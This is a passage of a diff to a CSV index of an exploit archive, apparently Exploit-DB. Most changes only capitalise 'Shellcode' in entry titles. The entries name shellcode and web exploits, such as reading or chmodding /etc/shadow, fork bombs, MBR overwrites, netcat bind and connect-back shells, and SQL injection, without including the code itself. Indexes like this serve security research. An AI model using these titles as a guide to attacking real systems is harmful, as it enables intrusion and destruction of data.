Winter-Smith",win_x86,shellcode,0 -13531,platforms/win_x86/shellcode/13531.c,"Windows XP SP1 - Portshell on port 58821 shellcode (116 bytes)",2004-09-26,silicon,win_x86,shellcode,0 +13531,platforms/win_x86/shellcode/13531.c,"Windows XP SP1 - Portshell on port 58821 Shellcode (116 bytes)",2004-09-26,silicon,win_x86,shellcode,0 13532,platforms/win_x86/shellcode/13532.asm,"Windows - (DCOM RPC2) Universal Shellcode",2003-10-09,anonymous,win_x86,shellcode,0 -13533,platforms/win_x86-64/shellcode/13533.asm,"Win64 - (URLDownloadToFileA) download and execute shellcode (218+ bytes)",2006-08-07,Weiss,win_x86-64,shellcode,0 -13548,platforms/lin_x86/shellcode/13548.asm,"Linux/x86 - kill all processes shellcode (9 bytes)",2010-01-14,root@thegibson,lin_x86,shellcode,0 -13549,platforms/lin_x86/shellcode/13549.c,"Linux/x86 - setuid(0) & execve(_/sbin/poweroff -f_) shellcode (47 bytes)",2009-12-04,ka0x,lin_x86,shellcode,0 -13550,platforms/lin_x86/shellcode/13550.c,"Linux/x86 - setuid(0) and cat /etc/shadow shellcode (49 bytes)",2009-12-04,ka0x,lin_x86,shellcode,0 -13551,platforms/lin_x86/shellcode/13551.c,"Linux/x86 - chmod(/etc/shadow_ 0666) & exit() shellcode (33 bytes)",2009-12-04,ka0x,lin_x86,shellcode,0 -13553,platforms/lin_x86/shellcode/13553.c,"Linux/x86 - Linux/x86 execve() shellcode (51 bytes)",2009-12-04,"fl0 fl0w",lin_x86,shellcode,0 +13533,platforms/win_x86-64/shellcode/13533.asm,"Win64 - (URLDownloadToFileA) download and execute Shellcode (218+ bytes)",2006-08-07,Weiss,win_x86-64,shellcode,0 +13548,platforms/lin_x86/shellcode/13548.asm,"Linux/x86 - kill all processes Shellcode (9 bytes)",2010-01-14,root@thegibson,lin_x86,shellcode,0 +13549,platforms/lin_x86/shellcode/13549.c,"Linux/x86 - setuid(0) & execve(_/sbin/poweroff -f_) Shellcode (47 bytes)",2009-12-04,ka0x,lin_x86,shellcode,0 +13550,platforms/lin_x86/shellcode/13550.c,"Linux/x86 - setuid(0) and cat /etc/shadow Shellcode (49 bytes)",2009-12-04,ka0x,lin_x86,shellcode,0 +13551,platforms/lin_x86/shellcode/13551.c,"Linux/x86 - chmod(/etc/shadow_ 0666) & exit() Shellcode (33 bytes)",2009-12-04,ka0x,lin_x86,shellcode,0 +13553,platforms/lin_x86/shellcode/13553.c,"Linux/x86 - Linux/x86 execve() Shellcode (51 bytes)",2009-12-04,"fl0 fl0w",lin_x86,shellcode,0 14247,platforms/php/webapps/14247.txt,"Auction_Software Script - Admin Login Bypass",2010-07-06,"ALTBTA ",php,webapps,0 -13560,platforms/windows/shellcode/13560.txt,"Windows XP SP2 - PEB ISbeingdebugged shellcode (56 bytes)",2009-12-14,anonymous,windows,shellcode,0 -13563,platforms/lin_x86/shellcode/13563.asm,"Linux/x86 - overwrite MBR on /dev/sda with _LOL!' shellcode (43 bytes)",2010-01-15,root@thegibson,lin_x86,shellcode,0 +13560,platforms/windows/shellcode/13560.txt,"Windows XP SP2 - PEB ISbeingdebugged Shellcode (56 bytes)",2009-12-14,anonymous,windows,shellcode,0 +13563,platforms/lin_x86/shellcode/13563.asm,"Linux/x86 - overwrite MBR on /dev/sda with _LOL!' Shellcode (43 bytes)",2010-01-15,root@thegibson,lin_x86,shellcode,0 13565,platforms/win_x86/shellcode/13565.asm,"Win32 XP SP3 - ShellExecuteA shellcode",2009-12-19,sinn3r,win_x86,shellcode,0 13566,platforms/lin_x86/shellcode/13566.c,"Linux/x86 - setreuid (0_0) & execve(/bin/rm /etc/shadow) shellcode",2009-12-19,mr_me,lin_x86,shellcode,0 13569,platforms/win_x86/shellcode/13569.asm,"Win32 XP SP3 - Add Firewall Rule to allow TCP traffic on port 445 shellcode",2009-12-24,sinn3r,win_x86,shellcode,0 -13570,platforms/freebsd_x86/shellcode/13570.c,"FreeBSD/x86 - portbind (Port 1337) shellcode (167 bytes)",2009-12-24,sbz,freebsd_x86,shellcode,0 -13571,platforms/win_x86/shellcode/13571.c,"Win32/XP SP2 - calc.exe shellcode (45 bytes)",2009-12-24,Stack,win_x86,shellcode,0 -13572,platforms/lin_x86/shellcode/13572.c,"Linux/x86 - unlink(/etc/passwd) & exit() shellcode (35 bytes)",2009-12-24,sandman,lin_x86,shellcode,0 -13574,platforms/win_x86/shellcode/13574.c,"Win32/XP SP2 (EN + AR) - cmd.exe shellcode (23 bytes)",2009-12-28,"AnTi SeCuRe",win_x86,shellcode,0 -13576,platforms/lin_x86/shellcode/13576.asm,"Linux/x86 - chmod 666 /etc/shadow shellcode (27 bytes)",2010-01-16,root@thegibson,lin_x86,shellcode,0 -13577,platforms/lin_x86/shellcode/13577.txt,"Linux/x86 - break chroot shellcode (79 bytes)",2009-12-30,root@thegibson,lin_x86,shellcode,0 -13578,platforms/lin_x86/shellcode/13578.txt,"Linux/x86 - fork bomb shellcode (6 bytes)",2009-12-30,root@thegibson,lin_x86,shellcode,0 -13579,platforms/lin_x86/shellcode/13579.c,"Linux/x86 - append '/etc/passwd' & exit() shellcode (107 bytes)",2009-12-31,sandman,lin_x86,shellcode,0 +13570,platforms/freebsd_x86/shellcode/13570.c,"FreeBSD/x86 - portbind (Port 1337) Shellcode (167 bytes)",2009-12-24,sbz,freebsd_x86,shellcode,0 +13571,platforms/win_x86/shellcode/13571.c,"Win32/XP SP2 - calc.exe Shellcode (45 bytes)",2009-12-24,Stack,win_x86,shellcode,0 +13572,platforms/lin_x86/shellcode/13572.c,"Linux/x86 - unlink(/etc/passwd) & exit() Shellcode (35 bytes)",2009-12-24,sandman,lin_x86,shellcode,0 +13574,platforms/win_x86/shellcode/13574.c,"Win32/XP SP2 (EN + AR) - cmd.exe Shellcode (23 bytes)",2009-12-28,"AnTi SeCuRe",win_x86,shellcode,0 +13576,platforms/lin_x86/shellcode/13576.asm,"Linux/x86 - chmod 666 /etc/shadow Shellcode (27 bytes)",2010-01-16,root@thegibson,lin_x86,shellcode,0 +13577,platforms/lin_x86/shellcode/13577.txt,"Linux/x86 - break chroot Shellcode (79 bytes)",2009-12-30,root@thegibson,lin_x86,shellcode,0 +13578,platforms/lin_x86/shellcode/13578.txt,"Linux/x86 - fork bomb Shellcode (6 bytes)",2009-12-30,root@thegibson,lin_x86,shellcode,0 +13579,platforms/lin_x86/shellcode/13579.c,"Linux/x86 - append '/etc/passwd' & exit() Shellcode (107 bytes)",2009-12-31,sandman,lin_x86,shellcode,0 13581,platforms/windows/shellcode/13581.txt,"Windows XP Pro SP2 English - _Message-Box_ Null Free Shellcode (16 bytes)",2010-01-03,Aodrulez,windows,shellcode,0 13582,platforms/windows/shellcode/13582.txt,"Windows XP Pro SP2 English - _Wordpad_ Null Free Shellcode (12 bytes)",2010-01-03,Aodrulez,windows,shellcode,0 -13586,platforms/lin_x86/shellcode/13586.txt,"Linux/x86 - eject /dev/cdrom shellcode (42 bytes)",2010-01-08,root@thegibson,lin_x86,shellcode,0 -13595,platforms/win_x86/shellcode/13595.c,"Win32 XP SP2 FR - calc shellcode (19 bytes)",2010-01-20,SkuLL-HackeR,win_x86,shellcode,0 -13599,platforms/lin_x86/shellcode/13599.txt,"Linux/x86 - polymorphic shellcode ip6tables -F (71 bytes)",2010-01-24,"Jonathan Salwan",lin_x86,shellcode,0 -13600,platforms/lin_x86/shellcode/13600.txt,"Linux/x86 - ip6tables -F shellcode (47 bytes)",2010-01-24,"Jonathan Salwan",lin_x86,shellcode,0 -13601,platforms/lin_x86/shellcode/13601.txt,"Linux/i686 - pacman -S (default package: backdoor) shellcode (64 bytes)",2010-01-24,"Jonathan Salwan",lin_x86,shellcode,0 -13602,platforms/lin_x86/shellcode/13602.txt,"Linux/i686 - pacman -R shellcode (59 bytes)",2010-01-24,"Jonathan Salwan",lin_x86,shellcode,0 -13609,platforms/lin_x86/shellcode/13609.c,"Linux/x86 - bin/cat /etc/passwd shellcode (43 bytes)",2010-02-09,fb1h2s,lin_x86,shellcode,0 -13614,platforms/win_x86/shellcode/13614.c,"Win32 XP SP3 English - cmd.exe shellcode (26 bytes)",2010-02-10,"Hellcode Research",win_x86,shellcode,0 -13615,platforms/win_x86/shellcode/13615.c,"Win32 XP SP2 Turkish - cmd.exe shellcode (26 bytes)",2010-02-10,"Hellcode Research",win_x86,shellcode,0 -13627,platforms/lin_x86/shellcode/13627.c,"Linux/x86 - /bin/sh shellcode (8 bytes)",2010-02-23,"JungHoon Shin",lin_x86,shellcode,0 -13628,platforms/lin_x86/shellcode/13628.c,"Linux/x86 - execve /bin/sh shellcode (21 bytes)",2010-02-27,ipv,lin_x86,shellcode,0 -13630,platforms/win_x86/shellcode/13630.c,"Windows XP Home Edition SP2 English - calc.exe shellcode (37 bytes)",2010-02-28,"Hazem mofeed",win_x86,shellcode,0 -13631,platforms/win_x86/shellcode/13631.c,"Windows XP Home Edition SP3 English - calc.exe shellcode (37 bytes)",2010-03-01,"Hazem mofeed",win_x86,shellcode,0 -13632,platforms/lin_x86/shellcode/13632.c,"Linux/x86 - disabled modsecurity shellcode (64 bytes)",2010-03-04,sekfault,lin_x86,shellcode,0 +13586,platforms/lin_x86/shellcode/13586.txt,"Linux/x86 - eject /dev/cdrom Shellcode (42 bytes)",2010-01-08,root@thegibson,lin_x86,shellcode,0 +13595,platforms/win_x86/shellcode/13595.c,"Win32 XP SP2 FR - calc Shellcode (19 bytes)",2010-01-20,SkuLL-HackeR,win_x86,shellcode,0 +13599,platforms/lin_x86/shellcode/13599.txt,"Linux/x86 - polymorphic Shellcode ip6tables -F (71 bytes)",2010-01-24,"Jonathan Salwan",lin_x86,shellcode,0 +13600,platforms/lin_x86/shellcode/13600.txt,"Linux/x86 - ip6tables -F Shellcode (47 bytes)",2010-01-24,"Jonathan Salwan",lin_x86,shellcode,0 +13601,platforms/lin_x86/shellcode/13601.txt,"Linux/i686 - pacman -S (default package: backdoor) Shellcode (64 bytes)",2010-01-24,"Jonathan Salwan",lin_x86,shellcode,0 +13602,platforms/lin_x86/shellcode/13602.txt,"Linux/i686 - pacman -R Shellcode (59 bytes)",2010-01-24,"Jonathan Salwan",lin_x86,shellcode,0 +13609,platforms/lin_x86/shellcode/13609.c,"Linux/x86 - bin/cat /etc/passwd Shellcode (43 bytes)",2010-02-09,fb1h2s,lin_x86,shellcode,0 +13614,platforms/win_x86/shellcode/13614.c,"Win32 XP SP3 English - cmd.exe Shellcode (26 bytes)",2010-02-10,"Hellcode Research",win_x86,shellcode,0 +13615,platforms/win_x86/shellcode/13615.c,"Win32 XP SP2 Turkish - cmd.exe Shellcode (26 bytes)",2010-02-10,"Hellcode Research",win_x86,shellcode,0 +13627,platforms/lin_x86/shellcode/13627.c,"Linux/x86 - /bin/sh Shellcode (8 bytes)",2010-02-23,"JungHoon Shin",lin_x86,shellcode,0 +13628,platforms/lin_x86/shellcode/13628.c,"Linux/x86 - execve /bin/sh Shellcode (21 bytes)",2010-02-27,ipv,lin_x86,shellcode,0 +13630,platforms/win_x86/shellcode/13630.c,"Windows XP Home Edition SP2 English - calc.exe Shellcode (37 bytes)",2010-02-28,"Hazem mofeed",win_x86,shellcode,0 +13631,platforms/win_x86/shellcode/13631.c,"Windows XP Home Edition SP3 English - calc.exe Shellcode (37 bytes)",2010-03-01,"Hazem mofeed",win_x86,shellcode,0 +13632,platforms/lin_x86/shellcode/13632.c,"Linux/x86 - disabled modsecurity Shellcode (64 bytes)",2010-03-04,sekfault,lin_x86,shellcode,0 13635,platforms/win_x86/shellcode/13635.txt,"Win32 - JITed stage-0 shellcode",2010-03-07,"Alexey Sintsov",win_x86,shellcode,0 13636,platforms/win_x86/shellcode/13636.c,"Win32 - JITed exec notepad Shellcode",2010-03-08,"Alexey Sintsov",win_x86,shellcode,0 -13639,platforms/win_x86/shellcode/13639.c,"Windows XP Professional SP2 ITA - calc.exe shellcode (36 bytes)",2010-03-11,Stoke,win_x86,shellcode,0 +13639,platforms/win_x86/shellcode/13639.c,"Windows XP Professional SP2 ITA - calc.exe Shellcode (36 bytes)",2010-03-11,Stoke,win_x86,shellcode,0 13642,platforms/win_x86/shellcode/13642.txt,"Win32 - Mini HardCode WinExec&ExitProcess Shellcode (16 bytes)",2010-03-18,czy,win_x86,shellcode,0 13645,platforms/windows/shellcode/13645.c,"Windows - JITed egg-hunter stage-0 shellcode",2010-03-20,"Alexey Sintsov",windows,shellcode,0 -13647,platforms/win_x86/shellcode/13647.txt,"Win32/XP SP3 (RU) - WinExec+ExitProcess cmd shellcode (12 bytes)",2010-03-24,"lord Kelvin",win_x86,shellcode,0 -13648,platforms/win_x86/shellcode/13648.rb,"Win32 - MessageBox shellcode (Metasploit)",2010-03-24,corelanc0d3r,win_x86,shellcode,0 -13649,platforms/windows/shellcode/13649.txt,"Windows XP/Vista/Windows 7 - JITed egg-hunter stage-0 shellcode Adjusted universal",2010-03-27,"Alexey Sintsov",windows,shellcode,0 +13647,platforms/win_x86/shellcode/13647.txt,"Win32/XP SP3 (RU) - WinExec+ExitProcess cmd Shellcode (12 bytes)",2010-03-24,"lord Kelvin",win_x86,shellcode,0 +13648,platforms/win_x86/shellcode/13648.rb,"Win32 - MessageBox Shellcode (Metasploit)",2010-03-24,corelanc0d3r,win_x86,shellcode,0 +13649,platforms/windows/shellcode/13649.txt,"Windows XP/Vista/Windows 7 - JITed egg-hunter stage-0 Shellcode Adjusted universal",2010-03-27,"Alexey Sintsov",windows,shellcode,0 13661,platforms/lin_x86/shellcode/13661.txt,"Linux/x86 - nc -lvve/bin/sh -p13377 shellcode",2010-04-02,anonymous,lin_x86,shellcode,0 -13669,platforms/lin_x86/shellcode/13669.c,"Linux/x86 - chmod(_/etc/shadow__ 0666) shellcode (36 bytes)",2010-04-14,Magnefikko,lin_x86,shellcode,0 -13670,platforms/lin_x86-64/shellcode/13670.c,"Linux/x86-64 - execve(_/bin/sh_) shellcode (25 bytes)",2010-04-14,Magnefikko,lin_x86-64,shellcode,0 -13671,platforms/lin_x86/shellcode/13671.c,"Linux/x86 - DoS-Badger-Game shellcode (6 bytes)",2010-04-14,Magnefikko,lin_x86,shellcode,0 -13673,platforms/lin_x86/shellcode/13673.c,"Linux/x86 - SLoc-DoS shellcode (55 bytes)",2010-04-14,Magnefikko,lin_x86,shellcode,0 +13669,platforms/lin_x86/shellcode/13669.c,"Linux/x86 - chmod(_/etc/shadow__ 0666) Shellcode (36 bytes)",2010-04-14,Magnefikko,lin_x86,shellcode,0 +13670,platforms/lin_x86-64/shellcode/13670.c,"Linux/x86-64 - execve(_/bin/sh_) Shellcode (25 bytes)",2010-04-14,Magnefikko,lin_x86-64,shellcode,0 +13671,platforms/lin_x86/shellcode/13671.c,"Linux/x86 - DoS-Badger-Game Shellcode (6 bytes)",2010-04-14,Magnefikko,lin_x86,shellcode,0 +13673,platforms/lin_x86/shellcode/13673.c,"Linux/x86 - SLoc-DoS Shellcode (55 bytes)",2010-04-14,Magnefikko,lin_x86,shellcode,0 13675,platforms/lin_x86/shellcode/13675.c,"Linux/x86 - execve(_a->/bin/sh_) Local-only Shellcode (14 bytes)",2010-04-17,Magnefikko,lin_x86,shellcode,0 13676,platforms/lin_x86/shellcode/13676.c,"Linux/x86 - chmod(_/etc/shadow__ 0777) Shellcode (33 bytes)",2010-04-18,sm0k,lin_x86,shellcode,0 -13677,platforms/lin_x86/shellcode/13677.c,"Linux/x86 - chmod(_/etc/shadow__ 0777) shellcode (29 bytes)",2010-04-19,Magnefikko,lin_x86,shellcode,0 -13679,platforms/linux/shellcode/13679.py,"Linux - write() & exit(0) shellcode genearator with customizable text",2010-04-20,Stoke,linux,shellcode,0 -13680,platforms/lin_x86/shellcode/13680.c,"Linux/x86 - polymorphic forkbombe shellcode (30 bytes)",2010-04-21,"Jonathan Salwan",lin_x86,shellcode,0 -13681,platforms/lin_x86/shellcode/13681.c,"Linux/x86 - forkbomb shellcode (6 bytes)",2010-04-21,"Jonathan Salwan",lin_x86,shellcode,0 +13677,platforms/lin_x86/shellcode/13677.c,"Linux/x86 - chmod(_/etc/shadow__ 0777) Shellcode (29 bytes)",2010-04-19,Magnefikko,lin_x86,shellcode,0 +13679,platforms/linux/shellcode/13679.py,"Linux - write() & exit(0) Shellcode genearator with customizable text",2010-04-20,Stoke,linux,shellcode,0 +13680,platforms/lin_x86/shellcode/13680.c,"Linux/x86 - polymorphic forkbombe Shellcode (30 bytes)",2010-04-21,"Jonathan Salwan",lin_x86,shellcode,0 +13681,platforms/lin_x86/shellcode/13681.c,"Linux/x86 - forkbomb Shellcode (6 bytes)",2010-04-21,"Jonathan Salwan",lin_x86,shellcode,0 13682,platforms/lin_x86/shellcode/13682.c,"Linux/x86 - setreud(getuid()_ getuid()) & execve(_/bin/sh_) Shellcode (34 bytes)",2010-04-22,Magnefikko,lin_x86,shellcode,0 -13688,platforms/lin_x86-64/shellcode/13688.c,"Linux/x86-64 - reboot(POWER_OFF) shellcode (19 bytes)",2010-04-25,zbt,lin_x86-64,shellcode,0 -13691,platforms/lin_x86-64/shellcode/13691.c,"Linux/x86-64 - execve(_/bin/sh_); shellcode (30 bytes)",2010-04-25,zbt,lin_x86-64,shellcode,0 -13692,platforms/lin_x86/shellcode/13692.c,"Linux/x86 - sends 'Phuck3d!' to all terminals shellcode (60 bytes)",2010-04-25,condis,lin_x86,shellcode,0 -13697,platforms/lin_x86/shellcode/13697.c,"Linux/x86 - execve(_/bin/bash___-p__NULL) shellcode (33 bytes)",2010-05-04,"Jonathan Salwan",lin_x86,shellcode,0 -13698,platforms/lin_x86/shellcode/13698.c,"Linux/x86 - polymorphic execve(_/bin/bash___-p__NULL) shellcode (57 bytes)",2010-05-05,"Jonathan Salwan",lin_x86,shellcode,0 +13688,platforms/lin_x86-64/shellcode/13688.c,"Linux/x86-64 - reboot(POWER_OFF) Shellcode (19 bytes)",2010-04-25,zbt,lin_x86-64,shellcode,0 +13691,platforms/lin_x86-64/shellcode/13691.c,"Linux/x86-64 - execve(_/bin/sh_); Shellcode (30 bytes)",2010-04-25,zbt,lin_x86-64,shellcode,0 +13692,platforms/lin_x86/shellcode/13692.c,"Linux/x86 - sends 'Phuck3d!' to all terminals Shellcode (60 bytes)",2010-04-25,condis,lin_x86,shellcode,0 +13697,platforms/lin_x86/shellcode/13697.c,"Linux/x86 - execve(_/bin/bash___-p__NULL) Shellcode (33 bytes)",2010-05-04,"Jonathan Salwan",lin_x86,shellcode,0 +13698,platforms/lin_x86/shellcode/13698.c,"Linux/x86 - polymorphic execve(_/bin/bash___-p__NULL) Shellcode (57 bytes)",2010-05-05,"Jonathan Salwan",lin_x86,shellcode,0 13699,platforms/win_x86/shellcode/13699.txt,"Windows XP SP2 FR - Download and Exec Shellcode",2010-05-10,Crack_MaN,win_x86,shellcode,0 -13702,platforms/lin_x86/shellcode/13702.c,"Linux/x86 - execve(_/usr/bin/wget__ _aaaa_); shellcode (42 bytes)",2010-05-17,"Jonathan Salwan",lin_x86,shellcode,0 -13703,platforms/lin_x86/shellcode/13703.txt,"Linux/x86 - sys_execve(_/bin/sh__ _0__ _0_) with umask 16 (sys_umask(14)) shellcode (45 bytes)",2010-05-31,gunslinger_,lin_x86,shellcode,0 -13704,platforms/solaris_x86/shellcode/13704.c,"Solaris/x86 - execve(_/bin/sh___/bin/sh__NULL) shellcode (27 bytes)",2010-05-20,"Jonathan Salwan",solaris_x86,shellcode,0 -13707,platforms/solaris_x86/shellcode/13707.c,"Solaris/x86 - Halt shellcode (36 bytes)",2010-05-20,"Jonathan Salwan",solaris_x86,shellcode,0 -13709,platforms/solaris_x86/shellcode/13709.c,"Solaris/x86 - Reboot() shellcode (37 bytes)",2010-05-21,"Jonathan Salwan",solaris_x86,shellcode,0 -13711,platforms/solaris_x86/shellcode/13711.c,"Solaris/x86 - Remote Download file shellcode (79 bytes)",2010-05-25,"Jonathan Salwan",solaris_x86,shellcode,0 -13712,platforms/lin_x86/shellcode/13712.c,"Linux/x86 - Disable randomize stack addresse shellcode (106 bytes)",2010-05-25,"Jonathan Salwan",lin_x86,shellcode,0 +13702,platforms/lin_x86/shellcode/13702.c,"Linux/x86 - execve(_/usr/bin/wget__ _aaaa_); Shellcode (42 bytes)",2010-05-17,"Jonathan Salwan",lin_x86,shellcode,0 +13703,platforms/lin_x86/shellcode/13703.txt,"Linux/x86 - sys_execve(_/bin/sh__ _0__ _0_) with umask 16 (sys_umask(14)) Shellcode (45 bytes)",2010-05-31,gunslinger_,lin_x86,shellcode,0 +13704,platforms/solaris_x86/shellcode/13704.c,"Solaris/x86 - execve(_/bin/sh___/bin/sh__NULL) Shellcode (27 bytes)",2010-05-20,"Jonathan Salwan",solaris_x86,shellcode,0 +13707,platforms/solaris_x86/shellcode/13707.c,"Solaris/x86 - Halt Shellcode (36 bytes)",2010-05-20,"Jonathan Salwan",solaris_x86,shellcode,0 +13709,platforms/solaris_x86/shellcode/13709.c,"Solaris/x86 - Reboot() Shellcode (37 bytes)",2010-05-21,"Jonathan Salwan",solaris_x86,shellcode,0 +13711,platforms/solaris_x86/shellcode/13711.c,"Solaris/x86 - Remote Download file Shellcode (79 bytes)",2010-05-25,"Jonathan Salwan",solaris_x86,shellcode,0 +13712,platforms/lin_x86/shellcode/13712.c,"Linux/x86 - Disable randomize stack addresse Shellcode (106 bytes)",2010-05-25,"Jonathan Salwan",lin_x86,shellcode,0 13715,platforms/lin_x86/shellcode/13715.c,"Linux/x86 - pwrite(_/etc/shadow__ hash_ 32_ 8) Shellcode (83 bytes)",2010-05-27,agix,lin_x86,shellcode,0 13716,platforms/lin_x86/shellcode/13716.c,"Linux/x86 - alphanumeric Bomb FORK Shellcode (117 bytes)",2010-05-27,agix,lin_x86,shellcode,0 13719,platforms/win_x86-64/shellcode/13719.txt,"Windows 7 Pro SP1 64 FR - (Beep) Shellcode (39 bytes)",2010-05-28,agix,win_x86-64,shellcode,0 13722,platforms/lin_x86/shellcode/13722.c,"Linux/x86 - Polymorphic setuid(0) + chmod(_/etc/shadow__ 0666) Shellcode (61 bytes)",2010-05-31,antrhacks,lin_x86,shellcode,0 -13723,platforms/lin_x86/shellcode/13723.c,"Linux/x86 - change mode 0777 of '/etc/shadow' with sys_chmod syscall shellcode (39 bytes)",2010-05-31,gunslinger_,lin_x86,shellcode,0 -13724,platforms/lin_x86/shellcode/13724.c,"Linux/x86 - kill all running process shellcode (11 bytes)",2010-05-31,gunslinger_,lin_x86,shellcode,0 -13725,platforms/lin_x86/shellcode/13725.txt,"Linux/x86 - change mode 0777 of '/etc/passwd' with sys_chmod syscall shellcode (39 bytes)",2010-05-31,gunslinger_,lin_x86,shellcode,0 -13726,platforms/lin_x86/shellcode/13726.txt,"Linux/x86 - sys_execve(_/bin/sh__ _-c__ _reboot_) shellcode (45 bytes)",2010-05-31,gunslinger_,lin_x86,shellcode,0 -13728,platforms/lin_x86/shellcode/13728.c,"Linux/x86 - sys_setuid(0) & sys_setgid(0) & execve (_/bin/sh_) shellcode (39 bytes)",2010-06-01,gunslinger_,lin_x86,shellcode,0 +13723,platforms/lin_x86/shellcode/13723.c,"Linux/x86 - change mode 0777 of '/etc/shadow' with sys_chmod syscall Shellcode (39 bytes)",2010-05-31,gunslinger_,lin_x86,shellcode,0 +13724,platforms/lin_x86/shellcode/13724.c,"Linux/x86 - kill all running process Shellcode (11 bytes)",2010-05-31,gunslinger_,lin_x86,shellcode,0 +13725,platforms/lin_x86/shellcode/13725.txt,"Linux/x86 - change mode 0777 of '/etc/passwd' with sys_chmod syscall Shellcode (39 bytes)",2010-05-31,gunslinger_,lin_x86,shellcode,0 +13726,platforms/lin_x86/shellcode/13726.txt,"Linux/x86 - sys_execve(_/bin/sh__ _-c__ _reboot_) Shellcode (45 bytes)",2010-05-31,gunslinger_,lin_x86,shellcode,0 +13728,platforms/lin_x86/shellcode/13728.c,"Linux/x86 - sys_setuid(0) & sys_setgid(0) & execve (_/bin/sh_) Shellcode (39 bytes)",2010-06-01,gunslinger_,lin_x86,shellcode,0 13729,platforms/win_x86-64/shellcode/13729.txt,"Windows 7 x64 - cmd Shellcode (61 bytes)",2010-06-01,agix,win_x86-64,shellcode,0 -13730,platforms/lin_x86/shellcode/13730.c,"Linux/x86 - unlink _/etc/shadow_ shellcode (33 bytes)",2010-06-02,gunslinger_,lin_x86,shellcode,0 -13731,platforms/lin_x86/shellcode/13731.c,"Linux/x86 - hard / unclean reboot shellcode (29 bytes)",2010-06-03,gunslinger_,lin_x86,shellcode,0 -13732,platforms/lin_x86/shellcode/13732.c,"Linux/x86 - hard / unclean reboot shellcode (33 bytes)",2010-06-03,gunslinger_,lin_x86,shellcode,0 -13733,platforms/solaris/shellcode/13733.c,"Solaris/x86 - SystemV killall command shellcode (39 bytes)",2010-06-03,"Jonathan Salwan",solaris,shellcode,0 +13730,platforms/lin_x86/shellcode/13730.c,"Linux/x86 - unlink _/etc/shadow_ Shellcode (33 bytes)",2010-06-02,gunslinger_,lin_x86,shellcode,0 +13731,platforms/lin_x86/shellcode/13731.c,"Linux/x86 - hard / unclean reboot Shellcode (29 bytes)",2010-06-03,gunslinger_,lin_x86,shellcode,0 +13732,platforms/lin_x86/shellcode/13732.c,"Linux/x86 - hard / unclean reboot Shellcode (33 bytes)",2010-06-03,gunslinger_,lin_x86,shellcode,0 +13733,platforms/solaris/shellcode/13733.c,"Solaris/x86 - SystemV killall command Shellcode (39 bytes)",2010-06-03,"Jonathan Salwan",solaris,shellcode,0 13735,platforms/osx/remote/13735.py,"OS X EvoCam Web Server 3.6.6 / 3.6.7 - Buffer Overflow",2010-06-05,d1dn0t,osx,remote,8080 13736,platforms/php/webapps/13736.txt,"DDLCMS 2.1 - (skin) Remote File Inclusion",2010-06-06,eidelweiss,php,webapps,0 13737,platforms/php/webapps/13737.txt,"Joomla Component com_djartgallery - Multiple Vulnerabilities",2010-06-06,d0lc3,php,webapps,0 @@ -12103,8 +12103,8 @@ id,file,description,date,author,platform,type,port 13739,platforms/php/webapps/13739.txt,"WmsCMS - Cross-Site Scripting / SQL Injection",2010-06-06,Ariko-Security,php,webapps,0 13740,platforms/php/webapps/13740.txt,"iScripts eSwap 2.0 - SQL Injection / Cross-Site Scripting",2010-06-06,Sid3^effects,php,webapps,0 13741,platforms/php/webapps/13741.txt,"iScripts easybiller 1.1 - SQL Injection",2010-06-06,Sid3^effects,php,webapps,0 -13742,platforms/lin_x86/shellcode/13742.c,"Linux/x86 - chown root:root /bin/sh shellcode (48 bytes)",2010-06-06,gunslinger_,lin_x86,shellcode,0 -13743,platforms/lin_x86/shellcode/13743.c,"Linux/x86 - give all user root access when execute /bin/sh shellcode (45 bytes)",2010-06-06,gunslinger_,lin_x86,shellcode,0 +13742,platforms/lin_x86/shellcode/13742.c,"Linux/x86 - chown root:root /bin/sh Shellcode (48 bytes)",2010-06-06,gunslinger_,lin_x86,shellcode,0 +13743,platforms/lin_x86/shellcode/13743.c,"Linux/x86 - give all user root access when execute /bin/sh Shellcode (45 bytes)",2010-06-06,gunslinger_,lin_x86,shellcode,0 15498,platforms/multiple/dos/15498.html,"Mozilla Firefox 3.6.12 - Remote Denial of Service",2010-11-12,"emgent white_sheep and scox",multiple,dos,0 15499,platforms/windows/local/15499.py,"Free WMA MP3 Converter 1.1 - Buffer Overflow (SEH)",2010-11-12,Dr_IDE,windows,local,0 13744,platforms/php/webapps/13744.txt,"RTRandomImage - Remote File Inclusion",2010-06-06,"Sn!pEr.S!Te Hacker",php,webapps,0 @@ -12136,7 +12136,7 @@ id,file,description,date,author,platform,type,port 13777,platforms/php/webapps/13777.txt,"Phreebooks 2.0 - Local File Inclusion",2010-06-08,"Gustavo Sorondo",php,webapps,0 13778,platforms/php/webapps/13778.txt,"Phreebooks 2.0 - Directory Traversal",2010-06-08,"Gustavo Sorondo",php,webapps,0 13779,platforms/php/webapps/13779.txt,"Pre Web Host - SQL Injection",2010-06-08,Mr.Benladen,php,webapps,0 -13781,platforms/php/webapps/13781.txt,"phplist 2.8.11 - SQL Injection",2010-06-08,d3v1l,php,webapps,0 +13781,platforms/php/webapps/13781.txt,"phpList 2.8.11 - SQL Injection",2010-06-08,d3v1l,php,webapps,0 13782,platforms/php/webapps/13782.txt,"Image Store - Remote file Upload",2010-06-08,Mr.FireStormm,php,webapps,0 13783,platforms/php/webapps/13783.txt,"GREEZLE - Global Real Estate Agent Site Auth SQL Injection",2010-06-09,"L0rd CrusAd3r",php,webapps,0 13784,platforms/php/webapps/13784.txt,"HauntmAx CMS Haunted House - Directory Listing / SQL Injection",2010-06-09,Sid3^effects,php,webapps,0 @@ -12148,7 +12148,7 @@ id,file,description,date,author,platform,type,port 14294,platforms/php/webapps/14294.txt,"sphider 1.3.5 - Remote File Inclusion",2010-07-09,Li0n-PaL,php,webapps,0 13790,platforms/asp/webapps/13790.txt,"iClone - SQL Injection",2010-06-09,Sid3^effects,asp,webapps,0 14333,platforms/php/webapps/14333.html,"Orbis CMS 1.0.2 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-07-11,10n1z3d,php,webapps,0 -14334,platforms/lin_x86/shellcode/14334.c,"Linux/x86 - netcat connect back port 8080 shellcode (76 bytes)",2010-07-11,blake,lin_x86,shellcode,0 +14334,platforms/lin_x86/shellcode/14334.c,"Linux/x86 - netcat connect back port 8080 Shellcode (76 bytes)",2010-07-11,blake,lin_x86,shellcode,0 13792,platforms/php/webapps/13792.txt,"Joomla Component cinema - SQL Injection",2010-06-09,Sudden_death,php,webapps,0 13793,platforms/asp/webapps/13793.txt,"Online Notebook Manager - SQL Injection",2010-06-09,"L0rd CrusAd3r",asp,webapps,0 13794,platforms/multiple/webapps/13794.txt,"Joomla 1.5 Jreservation Component - SQL Injection / Cross-Site 